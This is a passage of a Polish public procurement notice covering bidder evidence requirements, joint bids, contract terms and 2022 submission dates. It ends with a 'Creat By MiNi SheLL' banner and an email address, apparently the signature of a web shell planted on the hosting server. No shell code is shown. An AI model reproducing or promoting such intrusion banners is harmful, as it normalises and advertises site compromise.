do złożenia (także dla podmiotów udostępniających Wykonawcy<br/>zasoby) w wyznaczonym, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień<br/>złożenia potwierdzających brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, o których mowa w pkt. 9<br/>niniejszej IDW tj:<br/>1.1. W celu potwierdzenia: uprawnień do reprezentowania danego podmiotu oraz braku podstaw do wykluczenia w zakresie art. 109<br/>ust. 1 pkt 4) ustawy pzp: odpisu lub informacji Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru<br/>lub ewidencji (z zastrzeżeniem art. 127 ust. 2 oraz 274 ust. 4 ustawy pzp)<br/>1.2. Oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy pzp w zakresie<br/>podstaw wykluczenia wskazanych przez Zamawiającego, sporządzone zgodnie z Załącznikiem nr 6 do IDW.<br/>2. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1<br/>ustawy pzp, dane umożliwiające dostęp do tych środków.<br/>3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczpospolitej Polskiej zamiast informacji z Krajowego<br/>Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, składa dokument lub dokumenty wystawione<br/>w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania potwierdzających odpowiednio, że nie otwarto likwidacji, nie<br/>ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza<br/>nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia procedury.<br/>4. Dokument, o którym mowa w pkt. 3 powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1. Dotyczące zdolności technicznej lub zawodowej; 1.<br/>Zamawiający zgodnie z<br/>art. 274 ust. 1 ustawy pzp przed udzieleniem zamówienia wzywa Wykonawcę lub wykonawców wspólnie ubiegających się o<br/>udzielenia zamówienia, których oferta została najwyżej oceniona do złożenia (także dla podmiotów udostępniających Wykonawcy<br/>zasoby) w wyznaczonym, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień<br/>złożenia potwierdzających brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, o których mowa w pkt. 9<br/>niniejszej IDW tj:<br/>2.1.1.Wykazu robót budowlanych wykonanych przez Wykonawcę, o których mowa w pkt. 9.1.1.1.-9.1.1.3. IDW sporządzony według<br/>załącznika nr 4 do IDW, nie wcześniej niż w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - inne odpowiednie dokumenty;.<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych w ramach konsorcjum, wykaz<br/>robót budowlanych, dotyczy robót budowlanych w których wykonaniu wykonawca ten bezpośrednio uczestniczył;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca może w celu potwierdzenia spełniania warunków, o których mowa w pkt. 9 IDW w<br/>stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej innych podmiotów<br/>udostępniający zasoby niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych. Jeżeli Wykonawca w celu wykazania spełnienia<br/>warunków udziału w postępowaniu, o których mowa w pkt 9 IDW, będzie polegał na<br/>zdolnościach technicznych lub zawodowych lub sytuacji finansowej innych podmiotów,<br/>niezależnie od charakteru prawnego łączących go z nim stosunków prawnych, na potwierdzenie spełnienia warunków<br/>udziału w postępowaniu przedstawi on odpowiednie podmiotowe środki<br/>dowodowe dot. tych podmiotów, jakie Zamawiający żąda od Wykonawcy w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie takiego podmiotu lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających przedłoży<br/>zobowiązanie podmiotu udostępniającego zasoby, które potwierdzi, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/>zasobów oraz określi w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.W celu określenia zasobów podmiotu trzeciego tj. wiedzy i doświadczenia, potencjału<br/>technicznego, osób zdolnych do wykonania zamówienia lub zdolności finansowych lub<br/>ekonomicznych Zamawiający wymaga wskazania odpowiednio: imienia i nazwiska osób<br/>zdolnych do wykonania zamówienia, wartości środków finansowych; nazwy inwestycji/zadania,<br/>itp.<br/>Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub<br/>zawodowe lub ich sytuacja finansowa pozwalają na wykazanie przez Wykonawcę spełniania<br/>warunków udziału w postępowaniu oraz zbada czy nie zachodzą wobec tego podmiotu<br/>przesłanki wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>Zamawiający zgodnie z art. 274 ust. 1 ustawy pzp przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia podmiotowych<br/>środków dowodowych, o których mowa w pkt 11.2.2 - 11.2.3. IDW, potwierdzających brak<br/>podstaw do wykluczenia podmiotów, o których mowa w pkt. 11.3. z udziału w postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni nie podlegać wykluczeniu oraz<br/>spełniać warunki udziału w postępowaniu i złożyć podmiotowe środki dowodowe, które to potwierdzą. Ponadto tacy<br/>Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt. 11.1.1.<br/>IDW składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>4. Zgodnie z art.117 ust. 3 i 4 ustawy pzp: w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim<br/>przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy sporządzone zgodnie z<br/>załącznikiem nr 5 do IDW.<br/>5. Postanowienia pkt. 6 mają również odpowiednie zastosowanie do wspólników spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały określone w Części II Specyfikacji Warunków<br/>Zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-24 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com